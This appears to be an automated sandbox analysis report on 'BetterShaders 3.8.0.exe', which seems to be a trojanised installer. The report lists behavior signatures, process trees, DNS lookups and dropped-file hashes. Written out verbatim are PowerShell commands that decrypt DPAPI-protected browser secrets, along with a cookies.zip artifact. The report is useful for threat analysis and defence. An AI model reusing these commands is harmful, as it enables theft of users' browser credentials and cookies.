Analysis Overview
SHA256
c0c47f91e18fc087051c2172c74ae96e14e01fadb12af47d3e301e99e22da8c1
Threat Level: Shows suspicious behavior
The file BetterShaders 3.8.0.exe was assessed as: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Reads user/profile data of web browsers
Loads dropped DLL
Checks computer location settings
Looks up external IP address via web service
An obfuscated cmd.exe command-line is typically used to evade detection.
Program crash
Unsigned PE
Enumerates physical storage devices
Kills process with taskkill
Modifies Internet Explorer settings
Modifies registry class
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SendNotifyMessage
Opens file in notepad (likely ransom note)
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx
Enumerates processes with tasklist
Suspicious behavior: EnumeratesProcesses
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-27 14:35
Signatures
Unsigned PE
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:42
Platform
win7-20240508-en
Max time kernel
121s
Max time network
124s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2840 -s 220
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:42
Platform
win10v2004-20240508-en
Max time kernel
150s
Max time network
115s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipapi.co | N/A | N/A |
| N/A | ipapi.co | N/A | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\BetterShaders 3.8.0.exe
"C:\Users\Admin\AppData\Local\Temp\BetterShaders 3.8.0.exe"
C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe
C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,33,156,90,107,92,234,10,181,133,211,213,132,225,131,203,19,43,3,49,39,190,150,249,21,61,57,49,200,210,141,111,17,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,214,130,109,140,61,204,74,148,189,62,217,154,132,189,29,160,26,234,209,30,83,79,12,6,129,130,103,41,196,208,66,54,48,0,0,0,236,8,218,121,146,205,107,71,207,134,9,211,133,7,82,203,50,134,32,93,11,238,254,63,23,243,203,194,220,127,112,141,162,163,30,223,124,74,182,37,157,68,135,13,26,90,83,83,64,0,0,0,236,16,138,167,200,115,64,250,162,134,117,14,7,53,89,144,157,205,82,149,198,14,40,220,234,159,129,235,18,113,4,59,0,212,17,133,25,130,151,144,176,122,34,55,195,60,202,67,224,172,20,174,133,84,215,190,203,254,174,41,10,104,192,145), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,33,156,90,107,92,234,10,181,133,211,213,132,225,131,203,19,43,3,49,39,190,150,249,21,61,57,49,200,210,141,111,17,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,214,130,109,140,61,204,74,148,189,62,217,154,132,189,29,160,26,234,209,30,83,79,12,6,129,130,103,41,196,208,66,54,48,0,0,0,236,8,218,121,146,205,107,71,207,134,9,211,133,7,82,203,50,134,32,93,11,238,254,63,23,243,203,194,220,127,112,141,162,163,30,223,124,74,182,37,157,68,135,13,26,90,83,83,64,0,0,0,236,16,138,167,200,115,64,250,162,134,117,14,7,53,89,144,157,205,82,149,198,14,40,220,234,159,129,235,18,113,4,59,0,212,17,133,25,130,151,144,176,122,34,55,195,60,202,67,224,172,20,174,133,84,215,190,203,254,174,41,10,104,192,145), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,169,185,211,78,126,178,233,113,146,165,226,217,166,46,54,58,7,126,2,46,52,51,8,33,165,252,252,33,23,55,170,117,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,17,11,201,141,126,201,93,71,249,169,78,142,80,33,175,239,206,207,106,1,120,226,109,40,148,210,70,217,136,37,103,93,48,0,0,0,196,143,154,93,178,189,8,54,194,213,193,83,116,53,243,111,111,77,200,213,127,10,114,6,231,115,160,210,133,174,254,89,248,212,39,71,125,70,83,162,94,87,174,78,120,53,111,193,64,0,0,0,230,177,176,152,136,15,179,107,163,31,172,7,147,247,157,248,126,206,103,252,231,212,64,164,231,127,156,232,77,46,46,112,8,236,160,141,113,40,61,129,30,155,244,246,72,26,227,154,16,181,136,68,101,194,90,66,46,20,238,131,114,189,199,162), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,169,185,211,78,126,178,233,113,146,165,226,217,166,46,54,58,7,126,2,46,52,51,8,33,165,252,252,33,23,55,170,117,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,17,11,201,141,126,201,93,71,249,169,78,142,80,33,175,239,206,207,106,1,120,226,109,40,148,210,70,217,136,37,103,93,48,0,0,0,196,143,154,93,178,189,8,54,194,213,193,83,116,53,243,111,111,77,200,213,127,10,114,6,231,115,160,210,133,174,254,89,248,212,39,71,125,70,83,162,94,87,174,78,120,53,111,193,64,0,0,0,230,177,176,152,136,15,179,107,163,31,172,7,147,247,157,248,126,206,103,252,231,212,64,164,231,127,156,232,77,46,46,112,8,236,160,141,113,40,61,129,30,155,244,246,72,26,227,154,16,181,136,68,101,194,90,66,46,20,238,131,114,189,199,162), $null, 'CurrentUser')
C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe
"C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1960,i,286725663950501444,13712487493729718754,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1952 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe
"C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --field-trial-handle=2160,i,286725663950501444,13712487493729718754,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:3
C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe
"C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2536,i,286725663950501444,13712487493729718754,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1280 /prefetch:8
Network
Files
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\sl.pak
| MD5 | be05e8eea54a25cd15d807264f8aa284 |
| SHA1 | a63dc26044b31fb4e1a35b1f5778150d737ccfce |
| SHA256 | 63963e60a45495ff762f02e02fd42c723d7c482a44c07e50473cbf7ccdd73eca |
| SHA512 | 4163b3eeb5e55beacc53349cad6899e871d74109a50b28a001e98f0000cf6eb57d4e06f10a70557664f15f4456fbcbb80ac7dbd1174bd19a20975da108ef2dc5 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\sk.pak
| MD5 | 8e5ecfbf0ab9e00401f088489afed0c2 |
| SHA1 | a99df2ed2a00ade4cde178f73893b84aaee521cc |
| SHA256 | 25e0167d708a004e36e3c344e0209e979d42874122cae03ef2e2c5e110f39364 |
| SHA512 | 401ea003abfb4a32b52cfab912c2199800f54aabf1321802f973a9925f535d40cff9825832d98ca86eb3af794f64aa408dbbd99e2083f2e9fd0d02ec4debd301 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\ru.pak
| MD5 | 4fb18b712580caa5cdff8c8cbe9e67f3 |
| SHA1 | 79bdeed0aa9bef9a8396a426e370b4022b09243d |
| SHA256 | bee87b5ef0ab61c05eb3ed4c43ba0900a75a853fdaef2218ffa1b2eaa4d29d21 |
| SHA512 | fd91fae4dfded1fcb6cc0e6a6da4caa123c8347d1a9eff33c0d5339aa9854dc07bbb3c84e1880f260eaf932a1a2af9784157d5656b29d661e20961f499b1e5b0 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\ro.pak
| MD5 | 8c922129bfb61fe14fa035d965108823 |
| SHA1 | aa8d8dac978053163a303c1f1206480144d4b330 |
| SHA256 | 06c6486e8a42b447a55bd789bf2bc794354fa4be062139481e4612550f16c755 |
| SHA512 | 25f9c2b75febfe607cbdd872a82338aecb5f277ed2d3d80fe0ec01289e3361445102392ea23207658ac347a774a7f47bbe19672d49f080cd6aea220da5ac3618 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\pt-PT.pak
| MD5 | e4565bfa531c9c4344f84dc8be207c93 |
| SHA1 | 5d1084ad5bff80383129850a853fe1319c23199f |
| SHA256 | fcd194e5caf36be4958c559acbde4f28a957083bf2aceac893f9e5c9e65d8a95 |
| SHA512 | 531a318e8ef1683abe4bc7b44e7d3a4d6ef907d5e7ddfa1f5cea20414dd33060981afdb8d1f4813b05be90985f10fb892f9060f6c1f2b975984f12acc8cdce6a |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\tr.pak
| MD5 | 1e661df0ee32346b7816e1cec439e9da |
| SHA1 | 2bd38e0a4ec62f306aae932d8e448a0911a5a63c |
| SHA256 | 6c5dfdfe34c0f6b2b00364dbd7ef3c62fb0d71a163f9254a7b4b3624d66c4ec0 |
| SHA512 | ef49c1f329f00e2a9350e7a6e3789c6ea2c84026e541717e4d72ea3723ac29e9be3e0d4a82e36ccfab27365feceef0012c209c53e3b079148140e0f08f55de56 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\uk.pak
| MD5 | b11fcf5670f611e270552a51e8f4000a |
| SHA1 | c28630a621b77df7434fb016f5b1e50d456cf296 |
| SHA256 | 96f45509b52f046e70f3f61416b93ba8f2f5a0f06d7d849056161300a3ac6e5c |
| SHA512 | a6f357825e59c35f72d740ca23300b3e233be1949dc4c5c5a3a268f4e0194b0be839f95fc125d8527d851971952c09ac233b294002f43911c2599859d935e8c7 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\th.pak
| MD5 | 33dae3c79e7c1798eada31b70e3f2518 |
| SHA1 | c386f4babd6545c915dda9dfd4bcc8cae5ff6c86 |
| SHA256 | a88de31d7605a1c3eed2b5008cbf31de368d91fd57a543c995a3c2263144054a |
| SHA512 | a1d033f85ba340a8f6f3da1aaa15bb8b04abc1acca1e9554af04576f512d38e6088c406f3227e03239e741eab68fe3a83a0ee13aff3c51554fa7e41b1d42029d |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\te.pak
| MD5 | d251d089aa789bccc27a0b473d39e46c |
| SHA1 | 283d8fb6b6195b3427144773ffc4691c82e31f0e |
| SHA256 | 8dd7d206379445bd9afa4e01ab986c439cf70841d080fca6e152b453e94fcc49 |
| SHA512 | 27e6f13f6c7937c8121451d70ee90d2a2ce5e519d17e882a86b29a6a78764427022c36b6a99178e9933e01500b55bcbfd0dc79a6f028a046967c2c53f78424fa |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\ta.pak
| MD5 | 088f7313392bd5bd898a984b434cee97 |
| SHA1 | bda9d5f5e87055674aecdb609a46a046bb0a6903 |
| SHA256 | e2868cbfde36485e8227ec24789a809ef4590f8841e5ee625cee154ba3701e78 |
| SHA512 | f8849d13924da2f5e3bb98f2aae19317d3f4260ec8e916ab88a91d6af97c9ba8fab929f91acb3b5575e30e87dda847f1192b6b2dc1d05341ce75a86a4fee8edb |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\sw.pak
| MD5 | 0787972a076c6690e7938758c2a92e24 |
| SHA1 | dbf02e5a3ae26acb060b533bb006756c19122bfe |
| SHA256 | eb96ab83e2e08e811928742590178e97454863bc581dd8574d6a644fd3c6615a |
| SHA512 | 9f3560a3b648b1a7025cd8a98c39ec7634883aade1ac2c7836fde890cc04bd009aa5c1bca8354ee1259ebcd9482326c51a7d21bdee3caf92984ecbefab35d34c |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\sv.pak
| MD5 | 8132fd35c20f775508f5440b7f3d6871 |
| SHA1 | 4e50c2b45c69e95f95f34398a7a4babc06420c1a |
| SHA256 | 867687296810c4a95a1876edd91ce08e57ff1894c9f22913808fee1d21362589 |
| SHA512 | e13ca94f6766a49a9b11a128bad1a5803c3ae9aaa9a8a536995eaf510da071995fa27b087fd3f14422cf21792a54b9527a1fe658947a446a6764b32a86479d3f |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\sr.pak
| MD5 | b1f52cd111da3b1ea1f31e082f15ba25 |
| SHA1 | 3f4f13a0d253e8fbcfc1fb93125feed51f03bc56 |
| SHA256 | 1410f7d93d53642ef9aa8dfd92497c923d71a97e419a6219c7bee7798c3561e1 |
| SHA512 | 2c0ae8d36c496d570d6e013f859caf655a74047a2a27b79ad0895eba5a46c0895d123d532b8bfa4370ce67caf6b874cb29d751fd025586bfafad0bb800b22144 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\ur.pak
| MD5 | 7b5fed5150135b728bf8865246f7c8fc |
| SHA1 | 214b0f507ff6384b1b305f1718db43023499eeaa |
| SHA256 | a0c752a805da7dd6608ad04625734f4d27cb75b682f51b2dc8ef08350cc7a2cc |
| SHA512 | 81fc55db4b0635e09057fd060d9eb72bda5a5fd2d2e1e4284e1b45098b287c609526c766b030dd0eaebc0836a32bcbf6dc0aae94327c103f3f736b5cd051a8a1 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\zh-CN.pak
| MD5 | 8af3f2940137687b483ff2f4d9185b98 |
| SHA1 | 58ce1fcadd8ca27abd11f0614401a12a7e93b11e |
| SHA256 | 766f8ac9d4e06437fd3300608ad4d31228576dcaa1e164ccbc4333d56493e9fe |
| SHA512 | fe55fb3d0abab843e4ea1a33d590b3a9e885f6ea8a38cb8f651d090e8c5ea3400efd212502cac500ef26cc5d6b7a4a7cb66e4aee1a4bb13b97f0926ac99b16e0 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\zh-TW.pak
| MD5 | ca8bf0d267507545580758c81e9fb2c2 |
| SHA1 | 9ec7a2e731775bf3224317681847ffc54376702d |
| SHA256 | eb02d499aada4f358c0776c301416de758167ada695503c0e72135ee462fcdfc |
| SHA512 | d5322739253544d519d52aaf8a34fd0fcf3abcc49499e60d320265e85b173f49189d0f95c7ff67a9369400759830141bc342de7fb710cd047e8832070007716f |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\resources\elevate.exe
| MD5 | 792b92c8ad13c46f27c7ced0810694df |
| SHA1 | d8d449b92de20a57df722df46435ba4553ecc802 |
| SHA256 | 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37 |
| SHA512 | 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\resources\app.asar
| MD5 | e17391bf3cc98be5554b509c39908fb9 |
| SHA1 | 8f2e6726c940ce42df95a05c78385c824b4d560a |
| SHA256 | 7fbeab871461f743124788a03f048c21991e6f8cd165cf7af5ed87bf11126e3a |
| SHA512 | 998750ec0971f5aa7102253b38eb786dc3ba1f5ef9870a34ba7e4366cef37c04c15dca75467b17cfdb0b8c6950f042615ada8f6689d8cf8453460456133e67aa |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\7z-out\locales\vi.pak
| MD5 | b6174a2dd1e3f557cb99060fc3101063 |
| SHA1 | be115f1d2dc8135683a182ab5c09feab74a3c97f |
| SHA256 | b654478c2d28b97d821a75543a0494bc35548749fc3eeb6b33b08b4f5f4fd84c |
| SHA512 | ddbd38e7513f213b3603b1fbf16ad21fa34382cd11e33201cf579c2913a7b6e143a03bf12f11afb281a40c6948da9844b6c9d5ab372d7500184014e98ea74c19 |
C:\Users\Admin\AppData\Local\Temp\nst5BFC.tmp\StdUtils.dll
| MD5 | c6a6e03f77c313b267498515488c5740 |
| SHA1 | 3d49fc2784b9450962ed6b82b46e9c3c957d7c15 |
| SHA256 | b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e |
| SHA512 | 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803 |
C:\Users\Admin\AppData\Local\Temp\9de8b50f-df7b-4dca-843d-73f4cfc5c426.tmp.node
| MD5 | 3072b68e3c226aff39e6782d025f25a8 |
| SHA1 | cf559196d74fa490ac8ce192db222c9f5c5a006a |
| SHA256 | 7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01 |
| SHA512 | 61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_remtb3sv.bx4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2596-543-0x000001A3F9540000-0x000001A3F9562000-memory.dmp
memory/2596-550-0x000001A3F9A60000-0x000001A3F9AB0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | f48896adf9a23882050cdff97f610a7f |
| SHA1 | 4c5a610df62834d43f470cae7e851946530e3086 |
| SHA256 | 3ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78 |
| SHA512 | 16644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 46d6c89b6a449ce91c1a3691c516e10e |
| SHA1 | dedf2c05d83a8fc311e39fa86af575866f9f7ece |
| SHA256 | f6841440d2949cf97fb621923a2f931fca567382856cb60fa4c8ce3f9b81e55f |
| SHA512 | bd222cc430c28abe832787973ed2a7a07d58d92f34eed1ebfe69fc4cd8ed59443ed93799979fd39d1b76ef6ff247f3ceb12b3c537de09ffba72ebec748f3e1cd |
C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\cookies.zip
| MD5 | 76cdb2bad9582d23c1f6f4d868218d6c |
| SHA1 | b04f3ee8f5e43fa3b162981b50bb72fe1acabb33 |
| SHA256 | 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85 |
| SHA512 | 5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f |
memory/2536-618-0x0000028273950000-0x0000028273951000-memory.dmp
memory/2536-620-0x0000028273950000-0x0000028273951000-memory.dmp
memory/2536-619-0x0000028273950000-0x0000028273951000-memory.dmp
memory/2536-627-0x0000028273950000-0x0000028273951000-memory.dmp
memory/2536-626-0x0000028273950000-0x0000028273951000-memory.dmp
memory/2536-625-0x0000028273950000-0x0000028273951000-memory.dmp
memory/2536-624-0x0000028273950000-0x0000028273951000-memory.dmp
memory/2536-628-0x0000028273950000-0x0000028273951000-memory.dmp
memory/2536-630-0x0000028273950000-0x0000028273951000-memory.dmp
memory/2536-629-0x0000028273950000-0x0000028273951000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:41
Platform
win10v2004-20240426-en
Max time kernel
146s
Max time network
155s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ffmpeg.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 52.111.227.11:443 | | tcp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:41
Platform
win10v2004-20240426-en
Max time kernel
145s
Max time network
155s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libEGL.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:41
Platform
win7-20240419-en
Max time kernel
121s
Max time network
123s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BetterShaders 3.8.0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BetterShaders 3.8.0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BetterShaders 3.8.0.exe | N/A |
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\BetterShaders 3.8.0.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\BetterShaders 3.8.0.exe
"C:\Users\Admin\AppData\Local\Temp\BetterShaders 3.8.0.exe"
C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe
C:\Users\Admin\AppData\Local\Temp\2gTbeMldvUY1QbVk9q0VzKvt38D\BetterShaders.exe
Network
Files
